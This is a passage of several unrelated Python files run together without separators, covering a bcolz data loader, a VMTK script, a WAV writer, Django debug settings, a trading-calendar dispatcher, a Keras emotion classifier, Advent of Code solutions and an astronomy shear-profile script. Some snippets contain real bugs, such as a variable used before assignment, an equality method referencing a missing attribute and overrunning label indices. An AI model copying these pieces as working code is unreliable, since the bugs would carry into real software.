return normalized_short_names_data elif table_name == 'special_treatments': return normalized_special_treatments_data elif table_name == 'margins': return normalized_margins_data raise NotImplementedError(table_name) def _write_by_expr(expr, ndays=0): """ 以bcolz格式写入表达式数据 转换步骤: 1. 读取表数据转换为pd.DataFrame """ table_name = expr._name # 整理数据表 # 1. 读取表 df = odo(expr, pd.DataFrame) # 2. 调整转换数据 processed = _factory(table_name)(df) # 3. 列名称及类型标准化 out = _normalize_ad_ts_sid(processed, ndays) # 转换为bcolz格式并存储 rootdir = bcolz_table_path(table_name) if os.path.exists(rootdir): rmtree(rootdir) odo(out, rootdir) logger.info('表:{},数据存储路径:{}'.format(table_name, rootdir)) def write_dynamic_data_to_bcolz(tables=None): """ 将每日变动数据以bcolz格式存储,提高数据集加载速度 """ if not tables: to_does = DYNAMIC_TABLES else: to_does = ensure_list(to_does) for table in to_does: if table in DYNAMIC_TABLES: ndays = 0 logger.info('预处理表:{}'.format(table)) expr = STOCK_DB[table] _write_by_expr(expr, ndays) else: raise ValueError('要写入的数据表{}不在"{}"范围'.format( table, DYNAMIC_TABLES))
version_info = (2, 8, 0) __version__ = ".".join([str(v) for v in version_info])
from sys import maxsize class User: def __init__(self, firstname=None, lastname=None, address1=None, postcode=None, city=None, email=None, phone=None, password=None, id=None): self.firstname = firstname self.lastname = lastname self.address1 = address1 self.postcode = postcode self.city = city self.email = email self.phone = phone self.password=password self.id = id def __repr__(self): return "%s:%s:%s" % (self.id, self.firstname, self.lastname) def __eq__(self, other): return (self.id is None or other.id is None or self.id== other.id) and self.name == other.name def id_or_max(self): if self.id: return int(self.id) else: return maxsize
#!/usr/bin/env python ## Program: VMTK ## Module: $RCSfile: vmtkcenterlinemerge.py,v $ ## Language: Python ## Date: $Date: 2005/09/14 09:49:59 $ ## Version: $Revision: 1.4 $ ## Copyright (c) Luca Antiga, David Steinman. All rights reserved. ## See LICENSE file for details. ## This software is distributed WITHOUT ANY WARRANTY; without even ## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR ## PURPOSE. See the above copyright notices for more information. from __future__ import absolute_import #NEEDS TO STAY AS TOP LEVEL MODULE FOR Py2-3 COMPATIBILITY import vtk import sys from vmtk import pypes from vmtk import vtkvmtk class vmtkCenterlineMerge(pypes.pypeScript): def __init__(self): pypes.pypeScript.__init__(self) self.Centerlines = None self.RadiusArrayName = 'MaximumInscribedSphereRadius' self.GroupIdsArrayName = 'GroupIds' self.CenterlineIdsArrayName = 'CenterlineIds' self.TractIdsArrayName = 'TractIds' self.BlankingArrayName = 'Blanking' self.Length = 0.0 self.MergeBlanked = 1 self.SetScriptName('vmtkcenterlinemerge') self.SetScriptDoc('merge centerline tracts belonging to the same groups') self.SetInputMembers([ ['Centerlines','i','vtkPolyData',1,'','the input centerlines','vmtksurfacereader'], ['RadiusArrayName','radiusarray','str',1,'','name of the array where centerline radius is stored'], ['GroupIdsArrayName','groupidsarray','str',1,'','name of the array where centerline group ids are stored'], ['CenterlineIdsArrayName','centerlineidsarray','str',1,'','name of the array where centerline ids are stored'], ['TractIdsArrayName','tractidsarray','str',1,'','name of the array where centerline tract ids are stored'], ['BlankingArrayName','blankingarray','str',1,'','name of the array where centerline blanking information about branches is stored'], ['Length','length','float',1,'(0.0,)','length of the resampling interval'], ['MergeBlanked','mergeblanked','bool',1,'','toggle generation of segments for blanked groups'] ]) self.SetOutputMembers([ ['Centerlines','o','vtkPolyData',1,'','the output centerlines','vmtksurfacewriter'] ]) def Execute(self): if self.Centerlines == None: self.PrintError('Error: No input centerlines.') mergeCenterlines = vtkvmtk.vtkvmtkMergeCenterlines() mergeCenterlines.SetInputData(self.Centerlines) mergeCenterlines.SetRadiusArrayName(self.RadiusArrayName) mergeCenterlines.SetGroupIdsArrayName(self.GroupIdsArrayName) mergeCenterlines.SetCenterlineIdsArrayName(self.CenterlineIdsArrayName) mergeCenterlines.SetTractIdsArrayName(self.TractIdsArrayName) mergeCenterlines.SetBlankingArrayName(self.BlankingArrayName) mergeCenterlines.SetResamplingStepLength(self.Length) mergeCenterlines.SetMergeBlanked(self.MergeBlanked) mergeCenterlines.Update() self.Centerlines = mergeCenterlines.GetOutput() if __name__=='__main__': main = pypes.pypeMain() main.Arguments = sys.argv main.Execute()
import math import wave import struct # https://stackoverflow.com/questions/33879523/python-how-can-i-generate-a-wav-file-with-beeps import librosa import matplotlib.pyplot as plt import librosa.display ''' # sr == sampling rate x, sr = librosa.load("tensorsong.wav", sr=44100) # stft is short time fourier transform X = librosa.stft(x,hop_length=1024,n_fft=2048) #overlap #431 - 2047 -> #nfft is number of samples per fft # convert the slices to amplitude Xdb = librosa.amplitude_to_db(abs(X)) # ... and plot, magic! plt.figure(figsize=(14, 5)) Xdb[:500] = 0 print(Xdb.shape) librosa.display.specshow(Xdb, sr = sr, x_axis = 'time', y_axis = 'hz') plt.colorbar() plt.show() ''' def save_wav(file_name,audio_tensor,nchanels=1): # Open up a wav file wav_file=wave.open(file_name,"w") # wav params nchannels = nchanels sampwidth = 2 sample_rate = 44100.0 # 44100 is the industry standard sample rate - CD quality. If you need to # save on file size you can adjust it downwards. The stanard for low quality # is 8000 or 8kHz. nframes = max(audio_tensor.shape) #len(audio_tensor) comptype = "NONE" compname = "not compressed" wav_file.setparams((nchannels, sampwidth, sample_rate, nframes, comptype, compname)) # WAV files here are using short, 16 bit, signed integers for the # sample size. So we multiply the floating point data we have by 32767, the # maximum value for a short integer. NOTE: It is theortically possible to # use the floating point -1.0 to 1.0 data directly in a WAV file but not # obvious how to do that using the wave module in python. if nchannels == 1: # mono sound for sample in audio_tensor: sample = sample[0] wav_file.writeframes(struct.pack('h', int( sample * 32767.0 ))) if nchannels == 2: # stereo sound for sample in audio_tensor: for stereo in sample: # 1 left ear, 1 right ear iteratively wav_file.writeframes(struct.pack('h', int(stereo * 32767.0 ))) wav_file.close() # return
from __future__ import absolute_import from __future__ import unicode_literals from identify import identify UNKNOWN = 'unknown' IGNORED_TAGS = frozenset(( identify.DIRECTORY, identify.SYMLINK, identify.FILE, identify.EXECUTABLE, identify.NON_EXECUTABLE, identify.TEXT, identify.BINARY, )) ALL_TAGS = frozenset((identify.ALL_TAGS - IGNORED_TAGS) | {UNKNOWN})
import logging.config import sys from .base import * # NOQA # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATES[0]['OPTIONS'].update({'debug': True}) TIME_ZONE = 'UTC' STATIC_ROOT = str(ROOT_DIR.path('staticfiles')) STATIC_URL = '/staticfiles/' FAVICON_PATH = STATIC_URL + 'dist/webapp/app/extras/favicon.ico' STATICFILES_DIRS = ( ('dist', os.path.join(STATIC_ROOT, 'dist')), ) CACHES = { 'default': { 'BACKEND': 'django_redis.cache.RedisCache', 'LOCATION': 'redis://localhost:6379', 'KEY_PREFIX': 'default', 'OPTIONS': { 'DB': 0, 'PARSER_CLASS': 'redis.connection.HiredisParser', 'CONNECTION_POOL_CLASS': 'redis.BlockingConnectionPool', 'CONNECTION_POOL_CLASS_KWARGS': { 'max_connections': 50, 'timeout': 20, }, # 'MAX_CONNECTIONS': 1000, 'PICKLE_VERSION': -1, # Latest } } } SESSION_ENGINE = "django.contrib.sessions.backends.cache" # Turn off debug while imported by Celery with a workaround # See http://stackoverflow.com/a/4806384 if "celery" in sys.argv[0]: DEBUG = False # Debug Toolbar (http://django-debug-toolbar.readthedocs.org/) INSTALLED_APPS += ('debug_toolbar',) DEBUG_TOOLBAR_PATCH_SETTINGS = False MIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware', ] INTERNAL_IPS = ('127.0.0.1', '192.168.99.100',) DEBUG_TOOLBAR_PANELS = [ 'debug_toolbar.panels.versions.VersionsPanel', 'debug_toolbar.panels.timer.TimerPanel', 'debug_toolbar.panels.settings.SettingsPanel', 'debug_toolbar.panels.headers.HeadersPanel', 'debug_toolbar.panels.request.RequestPanel', 'debug_toolbar.panels.sql.SQLPanel', 'debug_toolbar.panels.cache.CachePanel', # 'debug_toolbar.panels.staticfiles.StaticFilesPanel', 'debug_toolbar.panels.templates.TemplatesPanel', 'debug_toolbar.panels.signals.SignalsPanel', 'debug_toolbar.panels.logging.LoggingPanel', 'debug_toolbar.panels.redirects.RedirectsPanel', ] DEBUG_TOOLBAR_CONFIG = { 'JQUERY_URL': '', } # By default (for development), show emails to console in DEBUG mode #EMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend' EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' #EMAIL_BACKEND = 'django_ses.SESBackend' print('EMAIL_BACKEND = {0}'.format(EMAIL_BACKEND)) CORS_ORIGIN_WHITELIST += ('http://localhost:3000',) # Kinesis Firehose: # ----------------- USE_FIREHOSE = False # Dynamodb Usage # -------------- USE_DYNAMODB_WORKERLOG_DB = True USE_DYNAMODB_FILTERLOG_DB = True USE_WORKER = False # SNS notifications are disabled for development ENABLE_STAFF_SNS_NOTIFICATIONS = False
import itertools as it import datetime as dt from dateutil import relativedelta as rd from trading_calendars import trading_calendar as tc from trading_calendars.errors import ( CalendarNameCollision, CyclicCalendarAlias, InvalidCalendarName ) from trading_calendars.always_open import AlwaysOpenCalendar from trading_calendars.exchange_calendar_asex import ASEXExchangeCalendar from trading_calendars.exchange_calendar_bvmf import BVMFExchangeCalendar from trading_calendars.exchange_calendar_cmes import CMESExchangeCalendar from trading_calendars.exchange_calendar_iepa import IEPAExchangeCalendar from trading_calendars.exchange_calendar_xams import XAMSExchangeCalendar from trading_calendars.exchange_calendar_xasx import XASXExchangeCalendar from trading_calendars.exchange_calendar_xbkk import XBKKExchangeCalendar from trading_calendars.exchange_calendar_xbog import XBOGExchangeCalendar from trading_calendars.exchange_calendar_xbom import XBOMExchangeCalendar from trading_calendars.exchange_calendar_xbru import XBRUExchangeCalendar from trading_calendars.exchange_calendar_xbud import XBUDExchangeCalendar from trading_calendars.exchange_calendar_xbue import XBUEExchangeCalendar from trading_calendars.exchange_calendar_xcbf import XCBFExchangeCalendar from trading_calendars.exchange_calendar_xcse import XCSEExchangeCalendar from trading_calendars.exchange_calendar_xdub import XDUBExchangeCalendar from trading_calendars.exchange_calendar_xfra import XFRAExchangeCalendar from trading_calendars.exchange_calendar_xhel import XHELExchangeCalendar from trading_calendars.exchange_calendar_xhkg import XHKGExchangeCalendar from trading_calendars.exchange_calendar_xice import XICEExchangeCalendar from trading_calendars.exchange_calendar_xidx import XIDXExchangeCalendar from trading_calendars.exchange_calendar_xist import XISTExchangeCalendar from trading_calendars.exchange_calendar_xjse import XJSEExchangeCalendar from trading_calendars.exchange_calendar_xkar import XKARExchangeCalendar from trading_calendars.exchange_calendar_xkls import XKLSExchangeCalendar from trading_calendars.exchange_calendar_xkrx import XKRXExchangeCalendar from trading_calendars.exchange_calendar_xlim import XLIMExchangeCalendar from trading_calendars.exchange_calendar_xlis import XLISExchangeCalendar from trading_calendars.exchange_calendar_xlon import XLONExchangeCalendar from trading_calendars.exchange_calendar_xmad import XMADExchangeCalendar from trading_calendars.exchange_calendar_xmex import XMEXExchangeCalendar from trading_calendars.exchange_calendar_xmil import XMILExchangeCalendar from trading_calendars.exchange_calendar_xmos import XMOSExchangeCalendar from trading_calendars.exchange_calendar_xnys import XNYSExchangeCalendar from trading_calendars.exchange_calendar_xnze import XNZEExchangeCalendar from trading_calendars.exchange_calendar_xosl import XOSLExchangeCalendar from trading_calendars.exchange_calendar_xpar import XPARExchangeCalendar from trading_calendars.exchange_calendar_xphs import XPHSExchangeCalendar from trading_calendars.exchange_calendar_xpra import XPRAExchangeCalendar from trading_calendars.exchange_calendar_xses import XSESExchangeCalendar from trading_calendars.exchange_calendar_xsgo import XSGOExchangeCalendar from trading_calendars.exchange_calendar_xshg import XSHGExchangeCalendar from trading_calendars.exchange_calendar_xsto import XSTOExchangeCalendar from trading_calendars.exchange_calendar_xswx import XSWXExchangeCalendar from trading_calendars.exchange_calendar_xtai import XTAIExchangeCalendar from trading_calendars.exchange_calendar_xtks import XTKSExchangeCalendar from trading_calendars.exchange_calendar_xtse import XTSEExchangeCalendar from trading_calendars.exchange_calendar_xwar import XWARExchangeCalendar from trading_calendars.exchange_calendar_xwbo import XWBOExchangeCalendar from trading_calendars.us_futures_calendar import QuantopianUSFuturesCalendar from trading_calendars.weekday_calendar import WeekdayCalendar import pandas as pd from pandas.tseries import holiday, offsets from pluto.coms.utils import conversions as cvr from pluto.trading_calendars import wrappers as wr from protos import calendar_pb2 as cpb _default_calendar_factories = { # Exchange calendars. 'ASEX': ASEXExchangeCalendar, 'BVMF': BVMFExchangeCalendar, 'CMES': CMESExchangeCalendar, 'IEPA': IEPAExchangeCalendar, 'XAMS': XAMSExchangeCalendar, 'XASX': XASXExchangeCalendar, 'XBKK': XBKKExchangeCalendar, 'XBOG': XBOGExchangeCalendar, 'XBOM': XBOMExchangeCalendar, 'XBRU': XBRUExchangeCalendar, 'XBUD': XBUDExchangeCalendar, 'XBUE': XBUEExchangeCalendar, 'XCBF': XCBFExchangeCalendar, 'XCSE': XCSEExchangeCalendar, 'XDUB': XDUBExchangeCalendar, 'XFRA': XFRAExchangeCalendar, 'XHEL': XHELExchangeCalendar, 'XHKG': XHKGExchangeCalendar, 'XICE': XICEExchangeCalendar, 'XIDX': XIDXExchangeCalendar, 'XIST': XISTExchangeCalendar, 'XJSE': XJSEExchangeCalendar, 'XKAR': XKARExchangeCalendar, 'XKLS': XKLSExchangeCalendar, 'XKRX': XKRXExchangeCalendar, 'XLIM': XLIMExchangeCalendar, 'XLIS': XLISExchangeCalendar, 'XLON': XLONExchangeCalendar, 'XMAD': XMADExchangeCalendar, 'XMEX': XMEXExchangeCalendar, 'XMIL': XMILExchangeCalendar, 'XMOS': XMOSExchangeCalendar, 'XNYS': XNYSExchangeCalendar, 'XNZE': XNZEExchangeCalendar, 'XOSL': XOSLExchangeCalendar, 'XPAR': XPARExchangeCalendar, 'XPHS': XPHSExchangeCalendar, 'XPRA': XPRAExchangeCalendar, 'XSES': XSESExchangeCalendar, 'XSGO': XSGOExchangeCalendar, 'XSHG': XSHGExchangeCalendar, 'XSTO': XSTOExchangeCalendar, 'XSWX': XSWXExchangeCalendar, 'XTAI': XTAIExchangeCalendar, 'XTKS': XTKSExchangeCalendar, 'XTSE': XTSEExchangeCalendar, 'XWAR': XWARExchangeCalendar, 'XWBO': XWBOExchangeCalendar, # Miscellaneous calendars. 'us_futures': QuantopianUSFuturesCalendar, '24/7': AlwaysOpenCalendar, '24/5': WeekdayCalendar, } _default_calendar_aliases = { 'AMEX': 'XNYS', 'NYSE': 'XNYS', 'NASDAQ': 'XNYS', 'BATS': 'XNYS', 'FWB': 'XFRA', 'LSE': 'XLON', 'TSX': 'XTSE', 'BMF': 'BVMF', 'CME': 'CMES', 'CBOT': 'CMES', 'COMEX': 'CMES', 'NYMEX': 'CMES', 'ICE': 'IEPA', 'ICEUS': 'IEPA', 'NYFE': 'IEPA', 'CFE': 'XCBF', 'JKT': 'XIDX', } class TradingCalendarDispatcher(object): """ A class for dispatching and caching trading calendars. Methods of a global instance of this class are provided by calendars.calendar_utils. Parameters ---------- calendars : dict[str -> TradingCalendar] Initial set of calendars. calendar_factories : dict[str -> function] Factories for lazy calendar creation. aliases : dict[str -> str] Calendar name aliases. """ def __init__(self, calendars, calendar_factories, aliases): self._calendars = calendars self._calendar_factories = dict(calendar_factories) self._aliases = dict(aliases) def get_calendar(self, name): """ Retrieves an instance of an TradingCalendar whose name is given. Parameters ---------- name : str The name of the TradingCalendar to be retrieved. Returns ------- calendar : calendars.TradingCalendar The desired calendar. """ canonical_name = self.resolve_alias(name) try: return self._calendars[canonical_name] except KeyError: # We haven't loaded this calendar yet, so make a new one. pass try: factory = self._calendar_factories[canonical_name] except KeyError: # We don't have a factory registered for this name. Barf. raise InvalidCalendarName(calendar_name=name) # Cache the calendar for future use. calendar = self._calendars[canonical_name] = factory() return calendar def has_calendar(self, name): """ Do we have (or have the ability to make) a calendar with ``name``? """ return ( name in self._calendars or name in self._calendar_factories or name in self._aliases ) def register_calendar(self, name, calendar, force=False): """ Registers a calendar for retrieval by the get_calendar method. Parameters ---------- name: str The key with which to register this calendar. calendar: TradingCalendar The calendar to be registered for retrieval. force : bool, optional If True, old calendars will be overwritten on a name collision. If False, name collisions will raise an exception. Default is False. Raises ------ CalendarNameCollision If a calendar is already registered with the given calendar's name. """ if force: self.deregister_calendar(name) if self.has_calendar(name): raise CalendarNameCollision(calendar_name=name) self._calendars[name] = calendar def register_calendar_type(self, name, calendar_type, force=False): """ Registers a calendar by type. This is useful for registering a new calendar to be lazily instantiated at some future point in time. Parameters ---------- name: str The key with which to register this calendar. calendar_type: type The type of the calendar to register. force : bool, optional If True, old calendars will be overwritten on a name collision. If False, name collisions will raise an exception. Default is False. Raises ------ CalendarNameCollision If a calendar is already registered with the given calendar's name. """ if force: self.deregister_calendar(name) if self.has_calendar(name): raise CalendarNameCollision(calendar_name=name) self._calendar_factories[name] = calendar_type def register_calendar_alias(self, alias, real_name, force=False): """ Register an alias for a calendar. This is useful when multiple exchanges should share a calendar, or when there are multiple ways to refer to the same exchange. After calling ``register_alias('alias', 'real_name')``, subsequent calls to ``get_calendar('alias')`` will return the same result as ``get_calendar('real_name')``. Parameters ---------- alias : str The name to be used to refer to a calendar. real_name : str The canonical name of the registered calendar. force : bool, optional If True, old calendars will be overwritten on a name collision. If False, name collisions will raise an exception. Default is False. """ if force: self.deregister_calendar(alias) if self.has_calendar(alias): raise CalendarNameCollision(calendar_name=alias) self._aliases[alias] = real_name # Ensure that the new alias doesn't create a cycle, and back it out if # we did. try: self.resolve_alias(alias) except CyclicCalendarAlias: del self._aliases[alias] raise def resolve_alias(self, name): """ Resolve a calendar alias for retrieval. Parameters ---------- name : str The name of the requested calendar. Returns ------- canonical_name : str The real name of the calendar to create/return. """ seen = [] while name in self._aliases: seen.append(name) name = self._aliases[name] # This is O(N ** 2), but if there's an alias chain longer than 2, # something strange has happened. if name in seen: seen.append(name) raise CyclicCalendarAlias( cycle=" -> ".join(repr(k) for k in seen) ) return name def deregister_calendar(self, name): """ If a calendar is registered with the given name, it is de-registered. Parameters ---------- cal_name : str The name of the calendar to be deregistered. """ self._calendars.pop(name, None) self._calendar_factories.pop(name, None) self._aliases.pop(name, None) def clear_calendars(self): """ Deregisters all current registered calendars """ self._calendars.clear() self._calendar_factories.clear() self._aliases.clear() global_calendar_dispatcher = TradingCalendarDispatcher( calendars={}, calendar_factories=_default_calendar_factories, aliases=_default_calendar_aliases ) _cache = {} def resolve_alias(name): return global_calendar_dispatcher.resolve_alias(name) def get_calendar_in_range(name, start_dt, end_dt=None, cache=False): """ Parameters ---------- name: str start_dt: pandas.Timestamp end_dt: pandas.Timestamp Returns ------- trading_calendars.TradingCalendar """ dis = global_calendar_dispatcher try: name = dis.resolve_alias(name) factory = dis._calendar_factories[name] except KeyError: # We don't have a factory registered for this name. Barf. raise InvalidCalendarName(calendar_name=name) if end_dt is None: end_dt = start_dt + pd.Timedelta(days=10) cal = wr.OpenOffsetFix(start_dt, end_dt, factory) if cache: #cache the latest instance _cache[name] = cal return cal def get_calendar(name): try: name = global_calendar_dispatcher.resolve_alias(name) cal = _cache[name] return cal except KeyError: raise RuntimeError("Calendar instance doesn't exist.") class TradingCalendar(tc.TradingCalendar): #todo: instead of calling init, we should call __new__ def __init__(self, start, end, proto_calendar): super(TradingCalendar, self).__init__(start, end) self._proto_calendar = proto_calendar self._regular_early_close = self._from_proto_time(proto_calendar.regular_early_close) def __new__(cls, start, end, proto_calendar): pass def _from_proto_time(self, proto_time): return dt.time(proto_time.hour, proto_time.minute) def _from_proto_holiday(self, proto_holiday): offsts = [self._from_proto_offset(offset) for offset in proto_holiday.offsets] return holiday.Holiday( proto_holiday.name, proto_holiday.year, proto_holiday.month, proto_holiday.day, offset=offsts.pop() if len(offsts) == 1 else offsts, observance=self._from_proto_observance(proto_holiday.observance), start_date=pd.Timestamp(cvr.to_datetime(proto_holiday.start_date)), end_date=pd.Timestamp(cvr.to_datetime(proto_holiday.end_date)), days_of_week=[day for day in proto_holiday.days_of_week] ) def _from_proto_offset(self, proto_offset): if proto_offset.type == cpb.Offset.MONDAY: return pd.DateOffset(weekday=rd.MO(proto_offset.n)) elif proto_offset.type == cpb.Offset.DAY: return pd.DateOffset(offsets.Day(proto_offset.n)) elif proto_offset.type == cpb.Offset.THURSDAY: return pd.DateOffset(weekday=rd.TH(proto_offset.n)) elif proto_offset.type == cpb.Offset.EASTER: return pd.DateOffset(offsets.Easter()) else: return def _from_proto_observance(self, proto_observance): if proto_observance == cpb.Observance.NEAREST_WORKDAY: return holiday.nearest_workday elif proto_observance == cpb.Observance.SUNDAY_TO_MONDAY: return holiday.sunday_to_monday else: return def close_times(self): pass def open_times(self): pass def name(self): return self._proto_calendar.name def tz(self): return self._proto_calendar.timezone def open_time(self): return self._from_proto_time(self._proto_calendar.open_time) def close_time(self): return self._from_proto_time(self._proto_calendar.close_time) def regular_holidays(self): return tc.HolidayCalendar( [self._from_proto_holiday(hol) for hol in self._proto_calendar.regular_holidays] ) def adhoc_holidays(self): return list( it.chain( *[pd.date_range( cvr.to_datetime(r.start_date), cvr.to_datetime(r.end_date)) for r in self._proto_calendar.adhoc_holidays]) ) def special_closes(self): return [ (sp.time, tc.HolidayCalendar( [self._from_proto_holiday(hol) for hol in sp.holidays])) for sp in self._proto_calendar.special_closes] def special_closes_adhoc(self): return [ (sp.time, [cvr.to_datetime(t).strftime("%Y-%m-%d") for t in sp.dates]) for sp in self._proto_calendar.special_closes_adhoc] def from_proto_calendar(proto_calendar, start, end=None, cache=False): if end is None: end = start + pd.Timedelta(days=365) #todo: cache the calendar return TradingCalendar(start, end, proto_calendar) def to_proto_calendar(calendar): #todo pass
"""A package for already-implemented machine learning Siamese architectures. """ from dualing.models.contrastive import ContrastiveSiamese from dualing.models.cross_entropy import CrossEntropySiamese from dualing.models.triplet import TripletSiamese
from random import randrange # from UnionFind_QuickFind import UnionFind test_size = 12 uf = UnionFind( test_size ) uf.enumerate() while 1 < uf.g : uf.union( randrange( test_size ), randrange( test_size ) ) uf.enumerate()
from keras.utils.np_utils import to_categorical import os import cv2 import numpy as np from sklearn.utils import shuffle from sklearn.model_selection import train_test_split from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten from keras.layers.convolutional import Conv2D from keras.layers.convolutional import MaxPooling2D from keras.optimizers import * import os dataPath = './dataset' data_dir_list = os.listdir(dataPath) # ['happiness', 'sadness', 'neutral', 'anger'] print(data_dir_list) imgDataList = [] for dataset in data_dir_list: img_list = os.listdir(dataPath+'/' + dataset) print('Loaded the images of dataset-'+'{}\n'.format(dataset)) # print(img_list) Btüün image datası for img in img_list: inputImg = cv2.imread(dataPath + '/' + dataset + '/' + img) inputImgResize = cv2.resize(inputImg, (48, 48)) # fotolar zaten 48x48. Emin olmak için resize yapıyorum imgDataList.append(inputImgResize) imgData = np.array(imgDataList) imgData = imgData.astype('float32') imgData = imgData/255 # Normalization num_classes = 4 # 981 #(shape, dtype, order) arr nin içi o yüzden 0 ı alıyoruz. Kaç tane img datası oldugunu gösteriyor num_of_samples = imgData.shape[0] print(num_of_samples) # 1lerden olusan 981 elemanlık array olustrudum labels = np.ones((num_of_samples), dtype='int64') # print(labels) labels[0:420] = 0 # 421 happiness labels[421:740] = 1 # 320 sadness labels[741:1055] = 2 # 315 neutral labels[1056:1271] = 3 # 216 anger # print(labels) Y = to_categorical(labels, num_classes) # Çoklu sınıflandırma ile ilgilendiğimiz için etiketleri kategorik olarak etiketlememiz gerekiyor # Elimizde bulunan sayıları(yani resimlerdeki sayıları 0 dan 6 ya kadar) encode ederek # başka formata cevirdik # 0 => [1,0,0,0,0,0,0,0,0,0] # 2 => [0,0,1,0,0,0,0,0,0,0] # 9 => [0,0,0,0,0,0,0,0,0,1] # Burada bizim yaptığımız encoding, one-hot-encoding olarak geçer # print(Y) # Shuffle the dataset x, y = shuffle(imgData, Y, random_state=2) # Shuffle işlemi arrlerin içinde indexlerin yerlerini değiştiriyor. Burda imgData içindeki imageların sırasını rastgele değiştirip x e yazdık. # Aynı şekilde Y içindekileri rastgele değiştirip y ye yazdık. # print(x) # print(y) # Split the dataset x_train, x_test, y_train, y_test = train_test_split( x, y, test_size=0.05, random_state=2) # Şimdi burada x in bir kısmını test olarak alıcam ve uyg içinde test olarak onu kullanıcam. # test_size = datasetimin %95 train %5 validation a ayır demek. # random_state ise yapılan işlemin belli bir sırada yapılmasını sağlıyor. input_shape = (48, 48, 3) # png datayı direkt kullandığımız için 3 kanalı var. digitRecognition da 1 demiştim çünkü ordaki datalar png değil csv içindeydi. model = Sequential() # modeli oluşturduk. # 1 model.add(Conv2D(filters=6, kernel_size=(5, 5), input_shape=input_shape, padding='Same', activation='relu')) # filters = convolution layerdaki filtre sayısı # kernel_size = filtrenin boyutu. # SamePadding kullanıyoruz(kenarlara 0 koyarak, input size = output size). # Activation func. = relu model.add(MaxPooling2D(pool_size=(2, 2))) # 2 model.add(Conv2D(filters=16, kernel_size=(5, 5), padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) # 3 model.add(Conv2D(filters=64, kernel_size=(5, 5), padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) # Flatten -> matrixi tek sütun haline getirme işlemi. ANN için model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(4, activation='softmax')) # Adam Optimizer # Learning rateimiz normalde sabittir. Adam Optimizer kullanarak değiştirebiliyoruz. optimizer = Adam(lr=0.001, beta_1=0.9, beta_2=0.999) # loss functionı categorical_crossentropy ile buluyoruz. Eğer yanlış predict ederse loss yüksek, doğru predict ederse loss 0. model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy']) # Fit the model hist = model.fit(x_train, y_train, batch_size=8, epochs=50, verbose=1, validation_data=(x_test, y_test)) # Epoch and Batch Size # 981 resmimiz var. batch__size = 64 dedim. 981/64 = 15,33 kez batch yaparız. # Bu da epoch olarak adlandırılır. Her epochta 15,33 kez batch yapıyoruz demek. # Evaluate model score = model.evaluate(x_test, y_test) print('Test accuracy:', score[1]) model.save('main.model')
from __future__ import absolute_import from .suites import NAMED_SUITES from .loggers import NAMED_LOGGERS
from functools import cache from itertools import product def parse_data(): with open('2021/21/input.txt') as f: data = f.read() return [int(line.rsplit(maxsplit=1)[1]) for line in data.splitlines()] def part_one(data): data = data.copy() scores = [0, 0] pi = 1 rolls = 0 def roll(): nonlocal rolls rolls += 1 return (rolls - 1) % 100 + 1 while True: pi ^= 1 data[pi] += sum(roll() for _ in range(3)) data[pi] = (data[pi] - 1) % 10 + 1 scores[pi] += data[pi] if scores[pi] >= 1000: return rolls * scores[pi ^ 1] def part_two(data): @cache def dirac_dice(p1, p2, s1=0, s2=0): wins = [0, 0] for rolls in product((1, 2, 3), repeat=3): new_p1 = (p1 + sum(rolls) - 1) % 10 + 1 new_s1 = s1 + new_p1 if new_s1 >= 21: wins[0] += 1 else: dp2, dp1 = dirac_dice(p2, new_p1, s2, new_s1) wins[0] += dp1 wins[1] += dp2 return wins return max(dirac_dice(*data.copy())) def main(): data = parse_data() print(f'Day 21 Part 01: {part_one(data)}') print(f'Day 21 Part 02: {part_two(data)}')
class Moon: def __init__(self, x, y, z): self.position = [x, y, z] self.velocity = [0, 0, 0] def update_velocity(self, other): for i in range(3): self.update_velocity_for_axe(other, i) def update_velocity_for_axe(self, other, axe): if self.position[axe] < other.position[axe]: self.velocity[axe] += 1 elif self.position[axe] > other.position[axe]: self.velocity[axe] -= 1 else: pass def move(self): for i in range(3): self.move_axe(i) def move_axe(self, axe): self.position[axe] += self.velocity[axe] def get_energy(self): return sum([abs(i) for i in self.position]) * sum( [abs(i) for i in self.velocity] ) def __repr__(self): return "pos<x=%4d, y=%4d, z=%4d>, vel<x=%4d, y=%4d, z=%4d>" % ( *self.position, *self.velocity, ) def __eq__(self, other): return self.position == other.position and self.velocity == other.velocity def get_info(self, axe): return (self.position[axe], self.velocity[axe])
#!/bin/env python import fitsio, numpy as np, json import esutil as eu from shear_stacking import * from sys import argv from multiprocessing import Pool, current_process, cpu_count from glob import glob import pylab as plt def getValues(s, key, functions): # what values are used for the slices: functions are direct columns? if key in functions.keys(): return eval(functions[key]) else: return s[key] def getSliceMask(values, lower, upper, return_num=False): if return_num is False: return (values >= lower) & (values < upper) else: return sum((values >= lower) & (values < upper)) def getQuadrantMask(lens, shapes, config): quad_flags = lens['quad_flags'] # no quadrant pairs OK if quad_flags <= 1: return np.array([], dtype='bool') # all OK if quad_flags == (2**0 + 2**1 + 2**2 + 2**3 + 2**4): return np.ones(shapes.size, dtype='bool') # not all quadrant pairs are OK # FIXME: needs to be defined from angles on the curved sky # NOTE: very restrictive due to strict ordering of quadrants # e.g. if all sources are in the top half, but quad_flags & 2 > 0, # then no source will be selected even if quad_flags & 8 > 0 if quad_flags & 2 > 0: return shapes[config['shape_dec_key']] > lens[config['lens_dec_key']] if quad_flags & 4 > 0: return shapes[config['shape_ra_key']] < lens[config['lens_ra_key']] if quad_flags & 8 > 0: return shapes[config['shape_dec_key']] < lens[config['lens_dec_key']] if quad_flags & 16 > 0: return shapes[config['shape_ra_key']] > lens[config['lens_ra_key']] def createProfile(config): n_jack = config['n_jack'] l = config['minrange'] u = config['maxrange'] n_bins = config['n_bins'] bin_type = config['bin_type'] if bin_type == "linear": bins = np.linspace(l, u, n_bins+1) elif bin_type == "log": dlogx = (np.log(u) - np.log(l))/n_bins bins = np.exp(np.log(l) + dlogx * np.arange(n_bins+1)) else: raise NotImplementedError("bin_type %s not in ['linear', 'log']" % bin_type) # create profile for all data and for each slice defined pnames = ['all'] for key, limit in 